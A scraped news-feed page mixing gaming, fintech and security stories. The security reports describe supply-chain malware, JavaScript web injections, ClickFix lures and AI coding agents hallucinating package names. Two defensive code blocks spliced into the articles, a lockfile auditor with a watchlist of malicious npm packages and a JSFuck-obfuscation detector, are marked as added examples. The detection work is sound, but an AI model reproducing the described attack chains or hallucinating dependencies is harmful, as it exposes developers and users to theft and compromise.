• bitcoin, Donald Trump, US bitcoin mining, tariffs, cryptocurrency, economic ambitions, mining capital, blockchain technology, digital currency, American economy

    ## Introduction

    In a world increasingly driven by technology and innovation, the dream of an all-American Bitcoin stands as a beacon of hope for many. President Donald Trump once envisioned the United States as the undisputed capital of Bitcoin mining, a hub where the digital currency thrives and flourishes. However, as the winds of ec...
    A False Start on the Road to an All-American Bitcoin
  • Inside Summer Game Fest 2025: How Geoff Keighley and Producers Pulled Off Event Amid Industry Layoffs, ‘GTA 6’ Delay and Switch 2 Release

    With the ongoing job cuts across the gaming industry, the shift of “Grand Theft Auto 6” from release this fall to a launch next spring, and the distraction of the first new Nintendo console in eight years, there was a chance that Summer Game Fest 2025 wouldn’t have the same allure as the annual video game showcase has had in years past. (There was also the factor of the actors strike against video game companies, which, as of June 11, has been called off by SAG-AFTRA.)

    But the gamers came out in full force for the Geoff Keighley-hosted event on June 6, which live-streamed out of the YouTube Theater at SoFi Stadium in Los Angeles.

    “Viewership was up significantly year over year,” Keighley told Variety. “Stream charts said it doubled its audience year over year for the peak concurrency to over 3 million peak concurrent viewers, which does not include China.”

    In person, both the Summer Game Fest live showcase event and its subsequent weekend Play Days event for developers and press saw “significantly higher” media creator attendance this year: more than 600 registered attendees vs. “somewhere in the 400s” in 2024, per SGF. The boost is an indicator that both the current U.S. political climate and significant changes in 2025’s game release schedule, like the delay of “Grand Theft Auto 6” until next May, didn’t affect interest in the event.

    “Things happen in the industry all the time that are big newsworthy happenings,” said Summer Game Fest producer and iam8bit co-creator Amanda White. “Switch 2 just happened and we’re here, it’s all working out, everybody’s having a great time playing games. It’s not irrelevant — it’s just part of the way things go.”

    As big a hit as the Switch 2 was with consumers upon release — selling more than 3.5 million units during the first four days after its June 5 launch — and noted multiple times during the Summer Game Fest live showcase on June 6, Nintendo’s new console was not the star of the three-day Play Days event for developers and media in Downtown Los Angeles, which ran June 7-9.

    “I have not seen a single attendee with a Switch 2 on campus,” SGF producer and iam8bit co-creator Jon M. Gibson said with a laugh. “There’s a few Switch 2s that Nintendo supplied. Some dev kits for Bandai and for Capcom. Of course, the launch happened on Thursday, so bandwidth from Nintendo is stretched thin with all the midnight launches and stuff. But they’re really supportive and supply some for some pre-release games, which is exciting.”

    Some big video game publishers such as EA, Take-Two and Ubisoft skipped this year’s SGF, eliminating potential splashy in-show hits for eagerly anticipated games like “Grand Theft Auto 6.” But SGF still managed a few big moments, like the announcement and trailer release for “Resident Evil Requiem.” Gibson and White attribute that reveal and other moments like it to the immense trust the festival has managed to build up with video game publishers in just a few years.

    “We are very proud of our ability to keep the trust of all the publishers on campus,” Gibson said. “Six years into SGF as a whole, four years into Play Days, we’re very good. Because we have to print everything ahead of time, too. So there are lots of unannounced things that we’re very careful about who sees what. We have vendors who print and produce and manufacture physical objects under very tight wraps. We’re just very protective, because we know what it means to have to keep a secret because we’ve had our own games that we’ve had to announce, as well. Capcom is a great example with ‘Resident Evil.’ We knew that for a very long time, but they trusted us with information, and we were very careful about what our team actually knew what was going on.”

    And even though some of the gaming giants sat this year out, White says conversations were already happening on the Play Days campus about who is ready to return next year and what they’ll bring.

    “People get excited, they come and see. And each year we grow, so people see more potential,” White said.

    As for next year, the June show will take place just a few weeks after the planned May 26 release for “GTA 6.” While Switch 2 didn’t seem to distract too much, will the draw of playing the newly launched “GTA 6” prove to be so powerful it outshines whatever could be announced at SGF 2026?

    “My view is that all boats rise with ‘GTA’ launch,” Keighley said. “It is a singular cultural event that is the biggest thing in all of entertainment this decade. It will bring more people into gaming, sell lots of consoles and bring back lapsed gamers. There will never be a better time to feel the excitement and energy around gaming than SGF 2026.”

    See more from Variety’s Q&A with Keighley about Summer Game Fest 2025 below.

    How was this year’s show impacted by the date shift for “GTA 6”? How much was planned before and after that big announcement?

    So far as I know there wasn’t any material impact, but I think the date move did allow a number of teams to feel more confident announcing their launch dates.

    Halfway through the year, what do you see as some of the biggest trends in gaming for 2025, and how did you look to reflect that in the show?

    We continue to see some of the most interesting and successful games come from smaller teams outside of the traditional publisher system – games like “Clair Obscur,” “Blue Prince” and “REPO.” So we wanted to highlight some of those projects at the show like “Ill” and “Mortal Shell 2.”

    What game announcements and trailers do you think resonated most with audiences after this show? What assets were the most popular?

    “Resident Evil Requiem” was a massive moment. Also we saw a lot of love for “Ill” from a small team in Canada and Armenia.
    VARIETY.COM
  • Aspora gets $50M from Sequoia to build remittance and banking solutions for Indian diaspora

    India has been one of the top recipients of remittances in the world for more than a decade. Inward remittances jumped from $55.6 billion in 2010-11 to $118.7 billion in 2023-24, according to data from the country’s central bank. The bank projects that figure will reach $160 billion in 2029.
    This means there is an increasing market for digitalized banking experiences for non-resident Indians (NRIs), ranging from remittances to investing in different assets back home.
    Aspora (formerly Vance) is trying to build a verticalized financial experience for the Indian diaspora by keeping convenience at the center. While a lot of financial products are in its future roadmap, the company currently focuses largely on remittances.
    “While multiple financial products for non-resident Indians exist, they don’t know about them because there is no digital journey for them. They possibly use the same banking app as residents, which makes it harder for them to discover products catered towards them,” Garg said.
    In the last year, the company has grown the volume of remittances by 6x — from $400 million to $2 billion in yearly volume processed.
    With this growth, the company has attracted a lot of investor interest. It raised $35 million in Series A funding last December — which was previously unreported — led by Sequoia with participation from Greylock, Y Combinator, Hummingbird Ventures, and Global Founders Capital. The round pegged the company’s valuation at $150 million. In the four months following, the company tripled its transaction volume, prompting investors to put in more money.
    The company announced today it has raised $50 million in Series B funding, co-led by Sequoia and Greylock, with Hummingbird, Quantum Light Ventures, and Y Combinator also contributing to the round. The startup said this round values the company at $500 million. The startup has raised over $99 million in funding to date.

    After pivoting from being Pipe.com for India, the company started by offering remittance for NRIs in the U.K. in 2023 and has expanded its presence in other markets, including Europe and the United Arab Emirates. It charges a flat fee for money transfer and offers a competitive rate. Now it also allows customers to invest in mutual funds in India. The startup markets its exchange rates as “Google rate” as customers often search for currency conversion rates, even though they may not reflect live rates.
    The startup is also set to launch in the U.S., one of the biggest remittance corridors to India, next month. Plus, it plans to open up shop in Canada, Singapore, and Australia by the fourth quarter of this year.
    Garg, who grew up in the UAE, said that remittances are just the start, and the company wants to build out more financial tools for NRIs.
    “We want to use remittances as a wedge and build all the financial solutions that the diaspora needs, including banking, investing, insurance, lending in the home country, and products that help them take care of their parents,” he told TechCrunch.
    He added that a large chunk of money that NRIs send home is for wealth creation rather than family sustenance. The startup said that 80% of its users are sending money to their own accounts back home.
    In the next few months, the company is launching a few products to offer more services. This month, it plans to launch a bill payment platform to let users pay for services like rent and utilities. Next month, it plans to launch fixed deposit accounts for non-resident Indians that allow them to park money in foreign currency. By the end of the year, it plans to launch a full-stack banking account for NRIs that typically takes days for users to open. While these accounts can help the diaspora maintain their tax status in India, a lot of people use a family member’s account because of the cumbersome process, and Aspora wants to simplify this.
    Apart from banking, the company also plans to launch a product that would help NRIs take care of their parents back home by offering regular medical checkups, emergency care coverage, and concierge services for other assistance.
    Besides global competitors like Remittly and Wise, the company also has India-based rivals like Abound, which was spun off from Times Internet.
    Sequoia’s Luciana Lixandru is confident that Aspora’s execution speed and verticalized solution will give it an edge.
    “Speed of execution, for me, is one of the main indicators in the early days of the future success of a company,” she told TechCrunch over a call. “Aspora moves fast, but it is also very deliberate in building corridor by corridor, which is very important in financial services.”
    TECHCRUNCH.COM
    Aspora gets $50M from Sequioa to build remittance and banking solutions for Indian diaspora
    India has been one of the top recipients of remittances in the world for more than a decade. Inward remittances jumped from $55.6 billion in 2010-11 to $118.7 billion in 2023-24, according to data from the country’s central bank. The bank projects that figure will reach $160 billion in 2029. This means there is an increasing market for digitalized banking experiences for non-resident Indians (NRIs), ranging from remittances to investing in different assets back home.

    Aspora (formerly Vance) is trying to build a verticalized financial experience for the Indian diaspora by keeping convenience at the center. While a lot of financial products are in its future roadmap, the company currently focuses largely on remittances.

    “While multiple financial products for non-resident Indians exist, they don’t know about them because there is no digital journey for them. They possibly use the same banking app as residents, which makes it harder for them to discover products catered towards them,” Garg said.

    In the last year, the company has grown the volume of remittances by 6x — from $400 million to $2 billion in yearly volume processed.

    With this growth, the company has attracted a lot of investor interest. It raised $35 million in Series A funding last December — which was previously unreported — led by Sequoia with participation from Greylock, Y Combinator, Hummingbird Ventures, and Global Founders Capital. The round pegged the company’s valuation at $150 million.

    In the four months following, the company tripled its transaction volume, prompting investors to put in more money. The company announced today it has raised $50 million in Series B funding, co-led by Sequoia and Greylock, with Hummingbird, Quantum Light Ventures, and Y Combinator also contributing to the round. The startup said this round values the company at $500 million. The startup has raised over $99 million in funding to date.

    After pivoting from being Pipe.com for India, the company started by offering remittance for NRIs in the U.K. in 2023 and has expanded its presence in other markets, including Europe and the United Arab Emirates. It charges a flat fee for money transfer and offers a competitive rate. Now it also allows customers to invest in mutual funds in India. The startup markets its exchange rates as “Google rate” as customers often search for currency conversion rates, even though they may not reflect live rates.

    The startup is also set to launch in the U.S., one of the biggest remittance corridors to India, next month. Plus, it plans to open up shop in Canada, Singapore, and Australia by the fourth quarter of this year.

    Garg, who grew up in the UAE, said that remittances are just the start, and the company wants to build out more financial tools for NRIs. “We want to use remittances as a wedge and build all the financial solutions that the diaspora needs, including banking, investing, insurance, lending in the home country, and products that help them take care of their parents,” he told TechCrunch.

    He added that a large chunk of money that NRIs send home is for wealth creation rather than family sustenance. The startup said that 80% of its users are sending money to their own accounts back home.

    In the next few months, the company is launching a few products to offer more services. This month, it plans to launch a bill payment platform to let users pay for services like rent and utilities. Next month, it plans to launch fixed deposit accounts for non-resident Indians that allow them to park money in foreign currency. By the end of the year, it plans to launch a full-stack banking account for NRIs that typically takes days for users to open. While these accounts can help the diaspora maintain their tax status in India, a lot of people use a family member’s account because of the cumbersome process, and Aspora wants to simplify this.

    Apart from banking, the company also plans to launch a product that would help NRIs take care of their parents back home by offering regular medical checkups, emergency care coverage, and concierge services for other assistance.

    Besides global competitors like Remittly and Wise, the company also has India-based rivals like Abound, which was spun off from Times Internet.

    Sequoia’s Luciana Lixandru is confident that Aspora’s execution speed and verticalized solution will give it an edge. “Speed of execution, for me, is one of the main indicators in the early days of the future success of a company,” she told TechCrunch over a call. “Aspora moves fast, but it is also very deliberate in building corridor by corridor, which is very important in financial services.”
  • Malicious PyPI Package Masquerades as Chimera Module to Steal AWS, CI/CD, and macOS Data

    Jun 16, 2025Ravie LakshmananMalware / DevOps

    Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that's capable of harvesting sensitive developer-related information, such as credentials, configuration data, and environment variables, among others.
    The package, named chimera-sandbox-extensions, attracted 143 downloads and likely targets users of a service called Chimera Sandbox, which was released by Singaporean tech company Grab last August to facilitate "experimentation and development of [machine learning] solutions."
    The package masquerades as a helper module for Chimera Sandbox, but "aims to steal credentials and other sensitive information such as Jamf configuration, CI/CD environment variables, AWS tokens, and more," JFrog security researcher Guy Korolevski said in a report published last week.
    Once installed, it attempts to connect to an external domain whose domain name is generated using a domain generation algorithm (DGA) in order to download and execute a next-stage payload.
    Specifically, the malware acquires from the domain an authentication token, which is then used to send a request to the same domain and retrieve the Python-based information stealer.

    The stealer malware is equipped to siphon a wide range of data from infected machines. This includes -

    JAMF receipts, which are records of software packages installed by Jamf Pro on managed computers
    Pod sandbox environment authentication tokens and git information
    CI/CD information from environment variables
    Zscaler host configuration
    Amazon Web Services account information and tokens
    Public IP address
    General platform, user, and host information

    The kind of data gathered by the malware shows that it's mainly geared towards corporate and cloud infrastructure. In addition, the extraction of JAMF receipts indicates that it's also capable of targeting Apple macOS systems.
    The collected information is sent via a POST request back to the same domain, after which the server assesses if the machine is a worthy target for further exploitation. However, JFrog said it was unable to obtain the payload at the time of analysis.
    "The targeted approach employed by this malware, along with the complexity of its multi-stage targeted payload, distinguishes it from the more generic open-source malware threats we have encountered thus far, highlighting the advancements that malicious packages have made recently," Jonathan Sar Shalom, director of threat research at JFrog Security Research team, said.

    "This new sophistication of malware underscores why development teams remain vigilant with updates—alongside proactive security research – to defend against emerging threats and maintain software integrity."
    The disclosure comes as SafeDep and Veracode detailed a number of malware-laced npm packages that are designed to execute remote code and download additional payloads. The packages in question are listed below -

    eslint-config-airbnb-compat (676 Downloads)
    ts-runtime-compat-check (1,588 Downloads)
    solders (983 Downloads)
    @mediawave/lib (386 Downloads)

    All the identified npm packages have since been taken down from npm, but not before they were downloaded hundreds of times from the package registry.
    SafeDep's analysis of eslint-config-airbnb-compat found that the JavaScript library has ts-runtime-compat-check listed as a dependency, which, in turn, contacts an external server defined in the former package ("proxy.eslint-proxy[.]site") to retrieve and execute a Base64-encoded string. The exact nature of the payload is unknown.
    "It implements a multi-stage remote code execution attack using a transitive dependency to hide the malicious code," SafeDep researcher Kunal Singh said.
    Solders, on the other hand, has been found to incorporate a post-install script in its package.json, causing the malicious code to be automatically executed as soon as the package is installed.
    "At first glance, it's hard to believe that this is actually valid JavaScript," the Veracode Threat Research team said. "It looks like a seemingly random collection of Japanese symbols. It turns out that this particular obfuscation scheme uses the Unicode characters as variable names and a sophisticated chain of dynamic code generation to work."
    Decoding the script reveals an extra layer of obfuscation, unpacking which reveals its main function: Check if the compromised machine is Windows, and if so, run a PowerShell command to retrieve a next-stage payload from a remote server ("firewall[.]tel").
    This second-stage PowerShell script, also obscured, is designed to fetch a Windows batch script from another domain ("cdn.audiowave[.]org") and configures a Windows Defender Antivirus exclusion list to avoid detection. The batch script then paves the way for the execution of a .NET DLL that reaches out to a PNG image hosted on ImgBB ("i.ibb[.]co").
    "[The DLL] is grabbing the last two pixels from this image and then looping through some data contained elsewhere in it," Veracode said. "It ultimately builds up in memory YET ANOTHER .NET DLL."

    Furthermore, the DLL is equipped to create task scheduler entries and features the ability to bypass user account control (UAC) using a combination of FodHelper.exe and programmatic identifiers (ProgIDs) to evade defenses and avoid triggering any security alerts to the user.
    The newly-downloaded DLL is Pulsar RAT, a "free, open-source Remote Administration Tool for Windows" and a variant of the Quasar RAT.
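A defender-side check for the two npm delivery patterns described above (malicious code reached through a transitive dependency, and code run by an install script), as an added example that is not from the article or from the researchers it cites. It walks a `package-lock.json` (lockfileVersion 2 or 3), flags the package names listed in this article and any entry npm marks with `hasInstallScript`, and reports the dependency chain that pulled each one in; the lockfile content, the names `constructed-app` and `example-native-addon`, and all version strings are constructed sample data.

```python
import json
import sys
from collections import deque

# npm package names reported as malicious in the article above.
WATCHLIST = {
    "eslint-config-airbnb-compat",
    "ts-runtime-compat-check",
    "solders",
    "@mediawave/lib",
}
DEP_FIELDS = ("dependencies", "devDependencies", "optionalDependencies")

# Constructed sample lockfile (not taken from any real project).
SAMPLE_LOCK = {
    "name": "constructed-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "constructed-app",
             "dependencies": {"eslint-config-airbnb-compat": "*",
                              "example-native-addon": "*"},
             "devDependencies": {"solders": "*"}},
        "node_modules/eslint-config-airbnb-compat": {
            "version": "0.0.0-sample",
            "dependencies": {"ts-runtime-compat-check": "*"}},
        "node_modules/ts-runtime-compat-check": {"version": "0.0.0-sample"},
        "node_modules/solders": {"version": "0.0.0-sample",
                                 "hasInstallScript": True},
        "node_modules/example-native-addon": {"version": "0.0.0-sample",
                                              "hasInstallScript": True},
    },
}


def package_name(path):
    """'node_modules/a/node_modules/@s/b' -> '@s/b'; '' is the root project."""
    return path.rsplit("node_modules/", 1)[-1] if path else "<root>"


def resolve(packages, from_path, dep):
    """Mimic Node resolution: the nearest enclosing node_modules wins."""
    base = from_path
    while True:
        candidate = f"{base}/node_modules/{dep}" if base else f"node_modules/{dep}"
        if candidate in packages:
            return candidate
        if not base:
            return None
        cut = base.rfind("/node_modules/")
        base = base[:cut] if cut != -1 else ""


def dependency_chains(packages):
    """Breadth-first walk from the root: shortest chain to each package path."""
    chains = {"": ["<root>"]}
    queue = deque([""])
    while queue:
        path = queue.popleft()
        for field in DEP_FIELDS:
            for dep in packages.get(path, {}).get(field, {}):
                target = resolve(packages, path, dep)
                if target is not None and target not in chains:
                    chains[target] = chains[path] + [package_name(target)]
                    queue.append(target)
    return chains


def audit_lockfile(lock):
    """Return findings for watchlisted names and install-script packages."""
    if lock.get("lockfileVersion", 1) < 2 or "packages" not in lock:
        raise ValueError("need a lockfileVersion 2 or 3 package-lock.json")
    packages = lock["packages"]
    chains = dependency_chains(packages)
    findings = []
    for path, entry in packages.items():
        if not path:
            continue  # the root project itself
        name = package_name(path)
        reasons = []
        if name in WATCHLIST:
            reasons.append("watchlisted")
        if entry.get("hasInstallScript"):
            # Not a verdict: native addons also use install scripts. Review it.
            reasons.append("install-script")
        if reasons:
            chain = chains.get(path, ["<unreachable>", name])
            findings.append({"name": name, "version": entry.get("version"),
                             "reasons": reasons, "chain": chain,
                             "transitive": len(chain) > 2})
    return sorted(findings, key=lambda f: f["name"])


if __name__ == "__main__":
    lock = SAMPLE_LOCK
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            lock = json.load(fh)
    for f in audit_lockfile(lock):
        print(f"{f['name']}@{f['version']}: {', '.join(f['reasons'])} "
              f"via {' > '.join(f['chain'])}")
```

An `install-script` finding on its own is a review item, since legitimate native addons also ship install scripts; installing with `npm ci --ignore-scripts` keeps such scripts from running until they have been reviewed.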
    "From a wall of Japanese characters to a RAT hidden within the pixels of a PNG file, the attacker went to extraordinary lengths to conceal their payload, nesting it a dozen layers deep to evade detection," Veracode said. "While the attacker's ultimate objective for deploying the Pulsar RAT remains unclear, the sheer complexity of this delivery mechanism is a powerful indicator of malicious intent."
    Crypto Malware in the Open-Source Supply Chain
    The findings also coincide with a report from Socket that identified credential stealers, cryptocurrency drainers, cryptojackers, and clippers as the main types of threats targeting the cryptocurrency and blockchain development ecosystem.

    Some of the examples of these packages include -

    express-dompurify and pumptoolforvolumeandcomment, which are capable of harvesting browser credentials and cryptocurrency wallet keys
    bs58js, which drains a victim's wallet and uses multi-hop transfers to obscure theft and frustrate forensic tracing.
    lsjglsjdv, asyncaiosignal, and raydium-sdk-liquidity-init, which function as clippers that monitor the system clipboard for cryptocurrency wallet strings and replace them with threat actor‑controlled addresses to reroute transactions to the attackers

    "As Web3 development converges with mainstream software engineering, the attack surface for blockchain-focused projects is expanding in both scale and complexity," Socket security researcher Kirill Boychenko said.
    "Financially motivated threat actors and state-sponsored groups are rapidly evolving their tactics to exploit systemic weaknesses in the software supply chain. These campaigns are iterative, persistent, and increasingly tailored to high-value targets."
    AI and Slopsquatting
    The rise of artificial intelligence (AI)-assisted coding, also called vibe coding, has unleashed another novel threat in the form of slopsquatting, where large language models (LLMs) can hallucinate non-existent but plausible package names that bad actors can weaponize to conduct supply chain attacks.
    Trend Micro, in a report last week, said it observed an unnamed advanced agent "confidently" cooking up a phantom Python package named starlette-reverse-proxy, only for the build process to crash with the error "module not found." However, should an adversary upload a package with the same name on the repository, it can have serious security consequences.

    Furthermore, the cybersecurity company noted that advanced coding agents and workflows such as Claude Code CLI, OpenAI Codex CLI, and Cursor AI with Model Context Protocol (MCP)-backed validation can help reduce, but not completely eliminate, the risk of slopsquatting.
    "When agents hallucinate dependencies or install unverified packages, they create an opportunity for slopsquatting attacks, in which malicious actors pre-register those same hallucinated names on public registries," security researcher Sean Park said.
    "While reasoning-enhanced agents can reduce the rate of phantom suggestions by approximately half, they do not eliminate them entirely. Even the vibe-coding workflow augmented with live MCP validations achieves the lowest rates of slip-through, but still misses edge cases."

    THEHACKERNEWS.COM
  • Call of Duty bosses offer top gunplay tips for Ballerina movie fans in Black Ops 6

    Activision has included movie assassin Ballerina in the latest multiplayer version of Black Ops 6 and here they are exclusively offering Daily Star readers their top tips to become a gun hero

    Tech | 17:04, 13 Jun 2025

    John Wick movie Ballerina has taken over Call of Duty and the bods behind the game have given us some top tips on how to become the shooter king.

    The movie follows actress Ana de Armas as protagonist badass assassin Eve Macarro as she takes on all kinds of baddies alongside Keanu Reeves’ anti-hero John Wick.

    And to celebrate the silver screen success, Activision has included Eve, aka Ballerina, into Black Ops 6 as a playable online character complete with her own guns, finishing move and load screen as a downloadable add-on.

    But how can you, like Ana herself, become the star of mass destruction in the PS5 and Xbox game?

    The makers of Call of Duty have offered Daily Star readers these exclusive tips for online multiplayer mayhem in the game…

    Embrace the Ruska Rogue: Don the "Ruska Rogue" Operator Skin for a sleek, black tactical look that screams stealth and deadly efficiency. Blend into the shadows and strike with calculated precision. You can adopt a minimalist, all-black approach to your loadout and Operator selection, channeling Wick's understated lethality. Remember, sometimes the most dangerous players are the ones you barely notice.

    Know Your Armoury: Equip the "Relevé" AK-74, "Plié" Saug, or "Arabesque" 9MM PM, all featuring High Table Coin Tracers and Death FX. Not only will you look good, but you'll also send a message: your enemies are just currency in your quest for victory. Aim for headshots to maximise your impact and conserve ammo. Use the AK-74 for mid-range engagements, the Saug for close-quarters dominance, and the 9MM PM as a reliable sidearm.

    Dance With Death, Literally (and Tactically Reload): Master the "Dance With Death" Finishing Move. Nothing is more demoralising than eliminating an opponent with a graceful, yet brutal, execution. Use it strategically when you're sure you're safe from interruption. However, don't get caught up in the theatrics. Like Macarro, seek tactical reloads after every engagement, ensuring you're always ready for the next threat.

    Pirouette to Victory: Utilise the "Pirouette" Emote to taunt your fallen foes. A well-timed pirouette can tilt the mental game in your favour, especially after a clutch play. But remember, survival is paramount. Know when to disengage and reposition, just like Ballerina. A tactical retreat can be just as effective as a head-on assault.

    Charm Your Way to the Top: Equip the "Keepsake" Weapon Charm as a reminder of your mission and to add a touch of personal flair to your weapon. Small details can make a big difference in your gameplay and standing in the lobby. Furthermore, master your weapon. An assassin knows the ins and outs of every firearm he or she uses. Practice with different weapons to find what suits your play style and become proficient with it.

    Know Your Role: Just like a ballerina needs to know their choreography, understand your role on the team. Are you the aggressive fragger, the objective player, or the support specialist? Tailor your loadout and play style to maximise your contribution to the team's success. Remember, even the most elegant ballerina needs a solid foundation. Use cover, listen for footsteps, and anticipate enemy movements. Situational awareness is key to survival.
    WWW.DAILYSTAR.CO.UK
  • Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month

    Jun 13, 2025Ravie LakshmananWeb Security / Network Security

    Cybersecurity researchers are calling attention to a "large-scale campaign" that has been observed compromising legitimate websites with malicious JavaScript injections.
    According to Palo Alto Networks Unit 42, these malicious injects are obfuscated using JSFuck, which refers to an "esoteric and educational programming style" that uses only a limited set of characters to write and execute code.
    The cybersecurity company has given the technique an alternate name, JSFireTruck, owing to the profanity involved.
    "Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols [, ], +, $, {, and }," security researchers Hardik Shah, Brad Duncan, and Pranay Kumar Chhaparwal said. "The code's obfuscation hides its true purpose, hindering analysis."

    Further analysis has determined that the injected code is designed to check the website referrer ("document.referrer"), which identifies the address of the web page from which a request originated.
    Should the referrer be a search engine such as Google, Bing, DuckDuckGo, Yahoo!, or AOL, the JavaScript code redirects victims to malicious URLs that can deliver malware, exploits, traffic monetization, and malvertising.
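
    A defender-side illustration of the point above, added here and not taken from Unit 42 or the original article: because the obfuscation hides strings such as document.referrer, a keyword search of page source misses the inject, but the skewed character profile of the script is easy to measure. The symbol alphabet, the thresholds and the sample page are assumptions constructed for this example.

```javascript
// Added example: heuristic scanner for JSFuck-style ("JSFireTruck") inline scripts.
// The alphabet below combines the symbols named in the article with the classic
// JSFuck set; it and the thresholds are assumptions, not values from Unit 42.
const OBFUSCATION_CHARS = new Set("[]()!+${}");

// Return the bodies of inline <script> elements (those without a src attribute).
function extractInlineScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    if (/\bsrc\s*=/i.test(attrs)) continue; // external script, nothing inline to profile
    if (body.trim().length === 0) continue;
    scripts.push({ offset: m.index, body });
  }
  return scripts;
}

// Measure how much of a script consists of the obfuscation alphabet.
// Whitespace is ignored: it neither counts toward totals nor breaks a run.
function profileScript(code) {
  let total = 0;
  let symbolic = 0;
  let run = 0;
  let longestRun = 0;
  for (const ch of code) {
    if (/\s/.test(ch)) continue;
    total++;
    if (OBFUSCATION_CHARS.has(ch)) {
      symbolic++;
      run++;
      if (run > longestRun) longestRun = run;
    } else {
      run = 0;
    }
  }
  const ratio = total === 0 ? 0 : symbolic / total;
  return { total, symbolic, ratio, longestRun };
}

// Flag inline scripts that contain a long unbroken symbol run (an obfuscated blob
// embedded in otherwise normal code) or that are symbol-dominated overall.
function scanHtml(html, { minRun = 150, minRatio = 0.7, minLength = 100 } = {}) {
  const findings = [];
  for (const { offset, body } of extractInlineScripts(html)) {
    const p = profileScript(body);
    const reasons = [];
    if (p.longestRun >= minRun) reasons.push("long-symbol-run");
    if (p.total >= minLength && p.ratio >= minRatio) reasons.push("high-symbol-ratio");
    if (reasons.length > 0) findings.push({ offset, reasons, ...p });
  }
  return findings;
}

// Constructed sample input. The blob is a harmless symbol-only expression repeated
// to reach a realistic length; it is only measured here, never evaluated.
const CONSTRUCTED_SYMBOL_BLOB = "(![]+[])[+[]]+".repeat(40) + "[]";
const SAMPLE_PAGE = [
  "<html><head>",
  '<script src="/static/app.js"></script>',
  "<script>const items = [1, 2, 3]; let total = 0; items.forEach((x) => { total += x; });</script>",
  "</head><body><p>Hello</p>",
  "<script>" + CONSTRUCTED_SYMBOL_BLOB + "</script>",
  "</body></html>",
].join("\n");

console.log(scanHtml(SAMPLE_PAGE));
```

    A hit is a lead for manual review of the page and of how the inject got there, not proof of compromise: minified or generated code can also be symbol-heavy, so tune the thresholds against your own sites.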

    Unit 42 said its telemetry uncovered 269,552 web pages that have been infected with JavaScript code using the JSFireTruck technique between March 26 and April 25, 2025. A spike in the campaign was first recorded on April 12, when over 50,000 infected web pages were observed in a single day.
    "The campaign's scale and stealth pose a significant threat," the researchers said. "The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities."
    Say Hello to HelloTDS
    The development comes as Gen Digital took the wraps off a sophisticated Traffic Distribution Service (TDS) called HelloTDS that's designed to conditionally redirect site visitors to fake CAPTCHA pages, tech support scams, fake browser updates, unwanted browser extensions, and cryptocurrency scams through remotely-hosted JavaScript code injected into the sites.
    The primary objective of the TDS is to act as a gateway, determining the exact nature of content to be delivered to the victims after fingerprinting their devices. If the user is not deemed a suitable target, the victim is redirected to a benign web page.

    "The campaign entry points are infected or otherwise attacker-controlled streaming websites, file sharing services, as well as malvertising campaigns," researchers Vojtěch Krejsa and Milan Špinka said in a report published this month.
    "Victims are evaluated based on geolocation, IP address, and browser fingerprinting; for example, connections through VPNs or headless browsers are detected and rejected."
    Some of these attack chains have been found to serve bogus CAPTCHA pages that leverage the ClickFix strategy to trick users into running malicious code and infecting their machines with malware known as PEAKLIGHT (aka Emmenhtal Loader), which is known to serve information stealers like Lumma.

    Central to the HelloTDS infrastructure is the use of .top, .shop, and .com top-level domains that are used to host the JavaScript code and trigger the redirections following a multi-stage fingerprinting process engineered to collect network and browser information.
    "The HelloTDS infrastructure behind fake CAPTCHA campaigns demonstrates how attackers continue to refine their methods to bypass traditional protections, evade detection, and selectively target victims," the researchers said.
    "By leveraging sophisticated fingerprinting, dynamic domain infrastructure, and deception tactics (such as mimicking legitimate websites and serving benign content to researchers) these campaigns achieve both stealth and scale."

    THEHACKERNEWS.COM
  • Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets

    Jun 14, 2025Ravie LakshmananMalware / Threat Intelligence

    A new malware campaign is exploiting a weakness in Discord's invitation system to deliver an information stealer called Skuld and the AsyncRAT remote access trojan.
    "Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers," Check Point said in a technical report. "The attackers combined the ClickFix phishing technique, multi-stage loaders, and time-based evasions to stealthily deliver AsyncRAT, and a customized Skuld Stealer targeting crypto wallets."
    The issue with Discord's invite mechanism is that it allows attackers to hijack expired or deleted invite links and secretly redirect unsuspecting users to malicious servers under their control. This also means that a Discord invite link that was once trusted and shared on forums or social media platforms could unwittingly lead users to malicious sites.

    Details of the campaign come a little over a month after the cybersecurity company revealed another sophisticated phishing campaign that hijacked expired vanity invite links to entice users into joining a Discord server and instruct them to visit a phishing site to verify ownership, only to have their digital assets drained upon connecting their wallets.
    While users can create temporary, permanent, or custom (vanity) invite links on Discord, the platform prevents other legitimate servers from reclaiming a previously expired or deleted invite. However, Check Point found that creating custom invite links allows the reuse of expired invite codes and even deleted permanent invite codes in some cases.

    This ability to reuse expired or deleted Discord invite codes when creating custom vanity invite links opens the door to abuse, allowing attackers to claim them for their malicious server.
    "This creates a serious risk: Users who follow previously trusted invite links (e.g., on websites, blogs, or forums) can unknowingly be redirected to fake Discord servers created by threat actors," Check Point said.
    The Discord invite-link hijacking, in a nutshell, involves taking control of invite links originally shared by legitimate communities and then using them to redirect users to the malicious server. Users who fall prey to the scheme and join the server are asked to complete a verification step in order to gain full server access by authorizing a bot, which then leads them to a fake website with a prominent "Verify" button.
    This is where the attackers take the attack to the next level by incorporating the infamous ClickFix social engineering tactic to trick users into infecting their systems under the pretext of verification.

    Specifically, clicking the "Verify" button surreptitiously executes JavaScript that copies a PowerShell command to the machine's clipboard, after which the users are urged to launch the Windows Run dialog, paste the already copied "verification string" (i.e., the PowerShell command), and press Enter to authenticate their accounts.
    But in reality, performing these steps triggers the download of a PowerShell script hosted on Pastebin that subsequently retrieves and executes a first-stage downloader, which is ultimately used to drop AsyncRAT and Skuld Stealer from a remote server and execute them.
    At the heart of this attack lies a meticulously engineered, multi-stage infection process designed for both precision and stealth, while also taking steps to subvert security protections through sandbox security checks.
    AsyncRAT, which offers comprehensive remote control capabilities over infected systems, has been found to employ a technique called dead drop resolver to access the actual command-and-control (C2) server by reading a Pastebin file.
